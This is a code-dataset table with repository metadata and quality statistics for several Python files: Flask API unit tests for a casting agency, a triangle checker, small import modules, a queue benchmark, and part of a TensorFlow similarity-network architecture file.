hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
d812d51cac520a019349e8b42b913a15dfe73065 | 11,320 | py | Python | test_app.py | nesreensada/FSND-capstone | 1497e5c78d27eb23c019cfc4f209d73b5f716d9f | [
"MIT"
] | null | null | null | test_app.py | nesreensada/FSND-capstone | 1497e5c78d27eb23c019cfc4f209d73b5f716d9f | [
"MIT"
] | null | null | null | test_app.py | nesreensada/FSND-capstone | 1497e5c78d27eb23c019cfc4f209d73b5f716d9f | [
"MIT"
] | null | null | null |
import os
import unittest
import json
from flask_sqlalchemy import SQLAlchemy
from app import create_app
from models import Movies, Actor, setup_db
DB_PATH = os.getenv('DATABASE_URL',
"postgresql://postgres@localhost:5432/casting_agency")
EXECUTIVE_PRODUCER_TOKEN = os.getgetenv("TOKEN")
headers = {'Authorization': f'Bearer {EXECUTIVE_PRODUCER_TOKEN}'}
class CastingTestCase(unittest.TestCase):
"""This class represents the Casting Agency test case"""
def setUp(self):
"""Define test variables and initialize app."""
self.app = create_app()
self.client = self.app.test_client
self.database_path = DB_PATH
setup_db(self.app, self.database_path)
self.actor = {
"name": "Nicholas Cage gdc",
"date_of_birth": "1950-03-9",
"gender": "M"
}
self.movie = {
"title": "Star Wars forever",
"duration": 120,
"release_year": "1971"
}
def tearDown(self):
"""Executed after reach test"""
pass
def test_get_authorization_url(self):
"""Test authorization url"""
res = self.client().get('/authorization/url')
self.assertEqual(res.status_code, 200)
def test_401_create_movie_noheader(self):
"""Test get movies without header """
res = self.client().post('/movies', json=self.movie)
data = json.loads(res.data)
self.assertEqual(res.status_code, 401)
self.assertEqual(data['success'], False)
self.assertEqual(data['message'], 'authorization_header_missing')
def test_200_create_movie_header(self):
"""Test get movies without header """
res = self.client().post('/movies', json=self.movie, headers=headers)
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertTrue(len(data['movie']))
def test_200_get_movies_noheader(self):
"""Test get movies without header since it does not require a header"""
res = self.client().get('/movies')
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertTrue(len(data['movie']))
def test_200_get_movies_header(self):
"""Test get movies with header """
res = self.client().get('/movies', headers=headers)
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertTrue(len(data['movie']))
def test_404_get_movie_id_header(self):
"""Test get movies by ID that is not found """
res = self.client().get('/movies/290', headers=headers)
data = json.loads(res.data)
self.assertEqual(res.status_code, 404)
self.assertEqual(data['success'], False)
self.assertEqual(data['message'], 'resource not found')
def test_401_get_movie_id_noheader(self):
"""Test get movies without header """
movie_id = Movies.query.all()[0].id
res = self.client().get(f'/movies/{movie_id}')
data = json.loads(res.data)
self.assertEqual(res.status_code, 401)
self.assertEqual(data['success'], False)
self.assertEqual(data['message'], 'authorization_header_missing')
def test_200_get_movie_id_header(self):
"""Test get movies by ID not found """
movie_id = Movies.query.all()[0].id
res = self.client().get(f'/movies/{movie_id}', headers=headers)
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertTrue(len(data['movie']))
def test_401_patch_movie_noheader(self):
"""Test patch movies without header """
movie_id = Movies.query.all()[0].id
data = {"duration": 150}
res = self.client().patch(f'/movies/{movie_id}', json=data)
data = json.loads(res.data)
self.assertEqual(res.status_code, 401)
self.assertEqual(data['success'], False)
self.assertEqual(data['message'], 'authorization_header_missing')
def test_404_patch_movie_header(self):
"""Test patch movies for a non found movie"""
data = {"duration": 150}
res = self.client().patch('/movies/290',
json=data, headers=headers)
data = json.loads(res.data)
self.assertEqual(res.status_code, 404)
self.assertEqual(data['success'], False)
self.assertEqual(data['message'], 'resource not found')
def test_200_patch_movie_header(self):
"""Test patch movies for a movie"""
movie_id = Movies.query.all()[0].id
data = {"duration": 150}
res = self.client().patch(f'/movies/{movie_id}',
json=data, headers=headers)
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertTrue(len(data['movie']))
def test_404_delete_movie_id_header(self):
"""Test get movies by ID that is not found """
res = self.client().delete('/movies/20', headers=headers)
data = json.loads(res.data)
self.assertEqual(res.status_code, 404)
self.assertEqual(data['success'], False)
self.assertEqual(data['message'], 'resource not found')
def test_401_delete_movie_id_noheader(self):
"""Test get movies without header """
movie_id = Movies.query.all()[0].id
res = self.client().delete(f'/movies/{movie_id}')
data = json.loads(res.data)
self.assertEqual(res.status_code, 401)
self.assertEqual(data['success'], False)
self.assertEqual(data['message'], 'authorization_header_missing')
def test_200_delete_movie_id_header(self):
"""Test get movies by ID not found """
movie_id = Movies.query.all()[0].id
res = self.client().delete(f'/movies/{movie_id}', headers=headers)
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
def test_401_create_actors_noheader(self):
"""Test get actors without header """
res = self.client().post('/actors', json=self.actor)
data = json.loads(res.data)
self.assertEqual(res.status_code, 401)
self.assertEqual(data['success'], False)
self.assertEqual(data['message'], 'authorization_header_missing')
def test_200_create_actor_header(self):
"""Test get actors with header """
res = self.client().post('/actors', json=self.actor, headers=headers)
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertTrue(len(data['actor']))
def test_404_get_actor_id_header(self):
"""Test get actors by ID that is not found """
res = self.client().get('/actors/100', headers=headers)
data = json.loads(res.data)
self.assertEqual(res.status_code, 404)
self.assertEqual(data['success'], False)
self.assertEqual(data['message'], 'resource not found')
def test_401_get_actor_id_noheader(self):
"""Test get actors without header """
actor_id = Actor.query.all()[0].id
res = self.client().get(f'/actors/{actor_id}')
data = json.loads(res.data)
self.assertEqual(res.status_code, 401)
self.assertEqual(data['success'], False)
self.assertEqual(data['message'], 'authorization_header_missing')
def test_200_get_actor_id_header(self):
"""Test get actors by ID not found """
actor_id = Actor.query.all()[0].id
res = self.client().get(f'/actors/{actor_id}', headers=headers)
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertTrue(len(data['actor']))
def test_200_get_actors_noheader(self):
"""Test get actors without header since it does not require a header"""
res = self.client().get('/actors')
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertTrue(len(data['actor']))
def test_200_get_actors_header(self):
"""Test get actors with header """
res = self.client().get('/actors', headers=headers)
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertTrue(len(data['actor']))
def test_401_patch_actors_noheader(self):
"""Test patch actors without header """
actor_id = Actor.query.all()[0].id
data = {"date_of_birth": "1950-03-1"}
res = self.client().patch(f'/actors/{actor_id}',
json=data)
data = json.loads(res.data)
self.assertEqual(res.status_code, 401)
self.assertEqual(data['success'], False)
self.assertEqual(data['message'], 'authorization_header_missing')
def test_404_patch_actors_header(self):
"""Test patch actors for a non found movie"""
data = {"date_of_birth": "1950-03-1"}
res = self.client().patch('/actors/100', json=data, headers=headers)
data = json.loads(res.data)
self.assertEqual(res.status_code, 404)
self.assertEqual(data['success'], False)
self.assertEqual(data['message'], 'resource not found')
def test_200_patch_actor_header(self):
"""Test patch actors for a actors"""
actor_id = Actor.query.all()[0].id
data = {"date_of_birth": "1950-03-1"}
res = self.client().patch(f'/actors/{actor_id}',
json=data, headers=headers)
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
self.assertTrue(len(data['actor']))
def test_404_delete_actor_id_header(self):
"""Test get actors by ID that is not found """
res = self.client().delete('/actors/100', headers=headers)
data = json.loads(res.data)
self.assertEqual(res.status_code, 404)
self.assertEqual(data['success'], False)
self.assertEqual(data['message'], 'resource not found')
def test_401_delete_actor_id_noheader(self):
"""Test get actors without header """
actor_id = Actor.query.all()[0].id
res = self.client().delete(f'/actors/{actor_id}')
data = json.loads(res.data)
self.assertEqual(res.status_code, 401)
self.assertEqual(data['success'], False)
self.assertEqual(data['message'], 'authorization_header_missing')
def test_200_delete_actor_id_header(self):
"""Test get actors by ID not found """
actor_id = Actor.query.all()[0].id
res = self.client().delete(f'/actors/{actor_id}', headers=headers)
data = json.loads(res.data)
self.assertEqual(res.status_code, 200)
self.assertEqual(data['success'], True)
# Make the tests conveniently executable
if __name__ == "__main__":
unittest.main()
| 40.141844 | 79 | 0.626678 | 1,431 | 11,320 | 4.804333 | 0.088749 | 0.146182 | 0.110545 | 0.094255 | 0.863709 | 0.856145 | 0.840145 | 0.822109 | 0.812945 | 0.7936 | 0 | 0.027186 | 0.233127 | 11,320 | 281 | 80 | 40.284698 | 0.764774 | 0.099735 | 0 | 0.602871 | 0 | 0 | 0.132085 | 0.029983 | 0 | 0 | 0 | 0 | 0.368421 | 1 | 0.138756 | false | 0.004785 | 0.028708 | 0 | 0.172249 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
d82274b05c3b95fcd71307887585f61e07a1207f | 199 | py | Python | math/Triangle Checker/python/triangle_checker.py | avi-pal/al-go-rithms | 5167a20f1db7b366ff19f2962c1746a02e4f5067 | [
"CC0-1.0"
] | 1,253 | 2017-06-06T07:19:25.000Z | 2022-03-30T17:07:58.000Z | math/Triangle Checker/python/triangle_checker.py | avi-pal/al-go-rithms | 5167a20f1db7b366ff19f2962c1746a02e4f5067 | [
"CC0-1.0"
] | 554 | 2017-09-29T18:56:01.000Z | 2022-02-21T15:48:13.000Z | math/Triangle Checker/python/triangle_checker.py | avi-pal/al-go-rithms | 5167a20f1db7b366ff19f2962c1746a02e4f5067 | [
"CC0-1.0"
] | 2,226 | 2017-09-29T19:59:59.000Z | 2022-03-25T08:59:55.000Z | # encoding utf-8
def triangle_checker(a, b, c):
return a + b > c and a + c > b and b + c > a
print(triangle_checker(3, 3, 3))
print(triangle_checker(3, 4, 5))
print(triangle_checker(6, 9, 15)) | 22.111111 | 48 | 0.643216 | 39 | 199 | 3.179487 | 0.461538 | 0.483871 | 0.483871 | 0.33871 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.069182 | 0.201005 | 199 | 9 | 49 | 22.111111 | 0.710692 | 0.070352 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0 | 0.2 | 0.4 | 0.6 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 6 |
d82e620f7531c5e3c0b7987aad053e5eee7b7e14 | 89 | py | Python | ddtrace/contrib/cassandra/patch.py | p7g/dd-trace-py | 141ac0ab6e9962e3b3bafc9de172076075289a19 | [
"Apache-2.0",
"BSD-3-Clause"
] | 308 | 2016-12-07T16:49:27.000Z | 2022-03-15T10:06:45.000Z | ddtrace/contrib/cassandra/patch.py | p7g/dd-trace-py | 141ac0ab6e9962e3b3bafc9de172076075289a19 | [
"Apache-2.0",
"BSD-3-Clause"
] | 1,928 | 2016-11-28T17:13:18.000Z | 2022-03-31T21:43:19.000Z | ddtrace/contrib/cassandra/patch.py | p7g/dd-trace-py | 141ac0ab6e9962e3b3bafc9de172076075289a19 | [
"Apache-2.0",
"BSD-3-Clause"
] | 311 | 2016-11-27T03:01:49.000Z | 2022-03-18T21:34:03.000Z | from .session import patch
from .session import unpatch
__all__ = ["patch", "unpatch"]
| 14.833333 | 30 | 0.730337 | 11 | 89 | 5.545455 | 0.545455 | 0.360656 | 0.557377 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.157303 | 89 | 5 | 31 | 17.8 | 0.813333 | 0 | 0 | 0 | 0 | 0 | 0.134831 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
d83abdfb34aca7f81891ee7e11e5398bb0d4d745 | 41 | py | Python | vcfiterator/__init__.py | ousamg/vcfiterator | cce80bef8e3987c9b6c39464264f6f412dc72f53 | [
"MIT"
] | 8 | 2015-01-08T18:47:12.000Z | 2021-07-03T20:18:12.000Z | vcfiterator/__init__.py | ousamg/vcfiterator | cce80bef8e3987c9b6c39464264f6f412dc72f53 | [
"MIT"
] | null | null | null | vcfiterator/__init__.py | ousamg/vcfiterator | cce80bef8e3987c9b6c39464264f6f412dc72f53 | [
"MIT"
] | 3 | 2019-08-01T22:23:28.000Z | 2020-09-11T14:43:42.000Z | from vcfiterator.main import VcfIterator
| 20.5 | 40 | 0.878049 | 5 | 41 | 7.2 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.097561 | 41 | 1 | 41 | 41 | 0.972973 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
dc3d2f938333b058d766df0d1be01e4a4ac30386 | 764 | py | Python | 7-assets/past-student-repos/LambdaSchool-master/m6/62a1/benchmarks/bm_queue.py | eengineergz/Lambda | 1fe511f7ef550aed998b75c18a432abf6ab41c5f | [
"MIT"
] | null | null | null | 7-assets/past-student-repos/LambdaSchool-master/m6/62a1/benchmarks/bm_queue.py | eengineergz/Lambda | 1fe511f7ef550aed998b75c18a432abf6ab41c5f | [
"MIT"
] | null | null | null | 7-assets/past-student-repos/LambdaSchool-master/m6/62a1/benchmarks/bm_queue.py | eengineergz/Lambda | 1fe511f7ef550aed998b75c18a432abf6ab41c5f | [
"MIT"
] | null | null | null | import time
from ll_queue import LLQueue
from arr_queue import ArrQueue
n = 100000
llq = LLQueue()
arrq = ArrQueue()
start_time = time.time()
for i in range(n):
llq.enqueue(i)
end_time = time.time()
print(f"LLQueue enqueue time: {end_time - start_time} seconds")
start_time = time.time()
for i in range(n):
arrq.enqueue(i)
end_time = time.time()
print(f"ArrQueue enqueue time: {end_time - start_time} seconds")
start_time = time.time()
for i in range(n):
llq.dequeue()
end_time = time.time()
print(f"LLQueue dequeue time: {end_time - start_time} seconds")
start_time = time.time()
for i in range(n):
arrq.dequeue()
end_time = time.time()
print(f"ArrQueue dequeue time: {end_time - start_time} seconds")
Collapse
| 16.608696 | 64 | 0.687173 | 121 | 764 | 4.190083 | 0.198347 | 0.252465 | 0.189349 | 0.134122 | 0.808679 | 0.808679 | 0.808679 | 0.558185 | 0.443787 | 0.443787 | 0 | 0.009404 | 0.164921 | 764 | 45 | 65 | 16.977778 | 0.785266 | 0 | 0 | 0.266667 | 0 | 0 | 0.280105 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.066667 | null | null | 0.088889 | 0 | 0 | 0 | null | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
dc47918eeacb1009111b567c9354338dad7828b1 | 41,274 | py | Python | xview/models/similarityArchitectures.py | davesean/modular_semantic_segmentation | 5f9e34243915b862e8fef5e6195f1e29f4cebf50 | [
"BSD-3-Clause"
] | 2 | 2018-12-18T16:15:14.000Z | 2020-04-16T07:38:04.000Z | xview/models/similarityArchitectures.py | davesean/modular_semantic_segmentation | 5f9e34243915b862e8fef5e6195f1e29f4cebf50 | [
"BSD-3-Clause"
] | null | null | null | xview/models/similarityArchitectures.py | davesean/modular_semantic_segmentation | 5f9e34243915b862e8fef5e6195f1e29f4cebf50 | [
"BSD-3-Clause"
] | null | null | null | import tensorflow as tf
from .vgg16 import vgg16
from tensorflow.python.layers.layers import max_pooling2d
from xview.models.cGAN_ops import residual_block, deconv2d, instance_norm
import os
from glob import glob
class batch_norm(object):
def __init__(self, epsilon=1e-5, momentum = 0.9, name="batch_norm"):
with tf.variable_scope(name):
self.epsilon = epsilon
self.momentum = momentum
self.name = name
def __call__(self, x, train=True):
return tf.layers.batch_normalization(x,momentum=self.momentum, epsilon=self.epsilon, name=self.name, training=train)
def lrelu(x, leak=0.2, name="lrelu"):
return tf.maximum(x, leak*x)
def conv2d(input_, output_dim,
k_h=4, k_w=4, d_h=2, d_w=2, stddev=0.02,
name="conv2d",pad="SAME"):
with tf.variable_scope(name, reuse=tf.AUTO_REUSE):
w = tf.get_variable('w', [k_h, k_w, input_.get_shape()[-1], output_dim],
initializer=tf.truncated_normal_initializer(stddev=stddev))
if pad=="VALID":
conv = tf.pad(input_, [[0,0],[1,1],[1,1],[0,0]], mode="CONSTANT")
conv = tf.nn.conv2d(conv, w, strides=[1, d_h, d_w, 1], padding=pad)
elif pad=="VALID_NOPAD":
conv = tf.nn.conv2d(input_, w, strides=[1, d_h, d_w, 1], padding='VALID')
else:
conv = tf.nn.conv2d(input_, w, strides=[1, d_h, d_w, 1], padding=pad)
biases = tf.get_variable('biases', [output_dim], initializer=tf.constant_initializer(0.0))
conv = tf.reshape(tf.nn.bias_add(conv, biases), tf.shape(conv))
return conv
def conv2d_from_tensors(input_, w, bias, d_h=2, d_w=2, pad="SAME"):
conv = tf.nn.conv2d(input_, w, strides=[1, d_h, d_w, 1], padding=pad)
conv = tf.reshape(tf.nn.bias_add(conv, bias), tf.shape(conv))
return conv
def instance_norm_from_tensors(x,scale,offset, epsilon=1e-5):
mean, var = tf.nn.moments(x, [1, 2], keep_dims=True)
out = scale * tf.div(x - mean, tf.sqrt(var + epsilon)) + offset
return out
def maxPool2d(input_,
k_h=4, k_w=4, d_h=2, d_w=2,
name="maxpool2d",pad="SAME"):
return tf.layers.max_pooling2d(inputs=input_, pool_size=[k_h,k_w], strides=[d_h,d_w], padding=pad)
def dense(input_, output_size, input_size, num_channels, name="dense", reuse=False, stddev=0.02, bias_start=0.0):
shape = input_size * input_size * num_channels
with tf.variable_scope(name):
matrix = tf.get_variable("Matrix", [shape, output_size], tf.float32,
tf.random_normal_initializer(stddev=stddev))
bias = tf.get_variable("bias", [output_size],
initializer=tf.constant_initializer(bias_start))
return tf.matmul(tf.layers.flatten(input_), matrix) + bias
class simArch(object):
def arch1(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
# image is 256 x 256 x (input_c_dim + input_c_dim)
with tf.variable_scope(var_scope) as scope:
if reuse:
tf.get_variable_scope().reuse_variables()
else:
assert tf.get_variable_scope().reuse == False
h0 = lrelu(conv2d(image, self.df_dim, k_h=4, k_w=4, d_h=4, d_w=4, name='s_h0_conv'))
# h0 is (64 x 64 x self.df_dim)
# h1 = lrelu(self.s_bn1(conv2d(h0, self.df_dim*2, k_h=4, k_w=4, d_h=4, d_w=4, name='s_h1_conv'),train=is_training))
h1 = lrelu(conv2d(h0, self.df_dim*2, k_h=4, k_w=4, d_h=4, d_w=4, name='s_h1_conv'))
# h1 is (16 x 16 x self.df_dim*2)
h2 = conv2d(h1, 1, k_h=2, k_w=2, d_h=2, d_w=2, name='s_h2_conv')
# h2 is (8 x 8 x 1)
return tf.nn.sigmoid(h2), h2, params['entropy']
archs = {
'arch1': arch1
}
def arch1A(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
# image is 256 x 256 x (input_c_dim + input_c_dim)
with tf.variable_scope(var_scope) as scope:
if reuse:
tf.get_variable_scope().reuse_variables()
else:
assert tf.get_variable_scope().reuse == False
image = ((image+1)/2)
h0 = lrelu(conv2d(image, self.df_dim, k_h=2, k_w=2, d_h=2, d_w=2, name='s_h0_conv'))
# h0 is (128 x 128 x self.df_dim)
h1 = lrelu(conv2d(h0, self.df_dim, k_h=2, k_w=2, d_h=2, d_w=2, name='s_h1_conv'))
h2 = lrelu(conv2d(h1, self.df_dim*2, k_h=2, k_w=2, d_h=2, d_w=2, name='s_h2_conv'))
h3 = lrelu(conv2d(h2, self.df_dim*2, k_h=2, k_w=2, d_h=2, d_w=2, name='s_h3_conv'))
h4 = conv2d(h3, 1, k_h=2, k_w=2, d_h=2, d_w=2, name='s_h4_conv')
# h4 is (8 x 8 x 1)
return tf.nn.sigmoid(h4), h4, params['entropy']
archs['arch1A'] = arch1A
def arch1B(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
# image is 256 x 256 x (input_c_dim + input_c_dim)
with tf.variable_scope(var_scope) as scope:
if reuse:
tf.get_variable_scope().reuse_variables()
else:
assert tf.get_variable_scope().reuse == False
image = ((image+1)/2)
h0 = lrelu(conv2d(image, self.df_dim, k_h=3, k_w=3, d_h=2, d_w=2, name='s_h0_conv', pad="VALID"))
# h0 is (128 x 128 x self.df_dim)
h1 = lrelu(conv2d(h0, self.df_dim, k_h=3, k_w=3, d_h=2, d_w=2, name='s_h1_conv', pad="VALID"))
h2 = lrelu(conv2d(h1, self.df_dim*2, k_h=3, k_w=3, d_h=2, d_w=2, name='s_h2_conv', pad="VALID"))
h4 = conv2d(h2, 1, k_h=3, k_w=3, d_h=2, d_w=2, name='s_h4_conv', pad="VALID")
# h4 is (8 x 8 x 1)
return tf.nn.sigmoid(h4), h4, params['entropy']
archs['arch1B'] = arch1B
def arch2(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
# image is 256 x 256 x (input_c_dim + input_c_dim)
with tf.variable_scope(var_scope) as scope:
if reuse:
tf.get_variable_scope().reuse_variables()
else:
assert tf.get_variable_scope().reuse == False
h0 = lrelu(conv2d(image, self.df_dim, k_h=1, k_w=1, d_h=1, d_w=1, name='s_h0_conv'))
# h0 is (256 x 256 x self.df_dim)
h1 = lrelu(conv2d(h0, self.df_dim*2, k_h=4, k_w=4, d_h=4, d_w=4, name='s_h1_conv'))
# h1 is (64 x 64 x self.df_dim*2)
h2 = maxPool2d(input_=h1, k_h=2, k_w=2, d_h=2, d_w=2, name="s_h2_maxpool2d")
# h2 is (32 x 32 x self.df_dim*2)
h3 = lrelu(conv2d(h2, self.df_dim*4, k_h=2, k_w=2, d_h=2, d_w=2, name='s_h3_conv'))
# h3 is (16 x 16 x self.df_dim*4)
h4 = conv2d(h3, 1, k_h=2, k_w=2, d_h=2, d_w=2, name='s_h4_conv')
# h4 is (8 x 8 x 1)
return tf.nn.sigmoid(h4), h4, params['entropy']
archs['arch2'] = arch2
def arch4(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
with tf.variable_scope(var_scope) as scope:
if reuse:
tf.get_variable_scope().reuse_variables()
else:
assert tf.get_variable_scope().reuse == False
h0 = lrelu(conv2d(image, 64, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h0_conv'))
h1 = lrelu(conv2d(h0, 64, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h1_conv'))
pool1 = max_pooling2d(h1, [2, 2], [2, 2], name='s_pool1')
h2 = lrelu(conv2d(pool1, 128, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h2_conv'))
h3 = lrelu(conv2d(h2, 128, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h3_conv'))
pool2 = max_pooling2d(h3, [2, 2], [2, 2], name='s_pool2')
h4 = lrelu(conv2d(pool2, 256, k_h=3, k_w=3, d_h=1, d_w=1, name='s_h4_conv'))
h5 = conv2d(h4, 1, k_h=8, k_w=8, d_h=8, d_w=8, name='s_h5_conv')
return tf.nn.sigmoid(h5), h5, params['entropy']
archs['arch4'] = arch4
def arch5(self, image, params, y=None, reuse=False, is_training=True, var_scope="sim_disc"):
"2ch pytorch impl from https://github.com/szagoruyko/cvpr15deepcompare/blob/master/pytorch/eval.py"
with tf.variable_scope(var_scope) as scope:
if reuse:
tf.get_variable_scope().reuse_variables()
else:
assert tf.get_variable_scope().reuse == False
image = (image+1)/2
h0 = lrelu(conv2d(image, 96, k_h=7, k_w=7, d_h=3, d_w=3, name='s_h0_conv'))
pool1 = max_pooling2d(h0, [2, 2], [2, 2], name='s_pool1', padding='same')
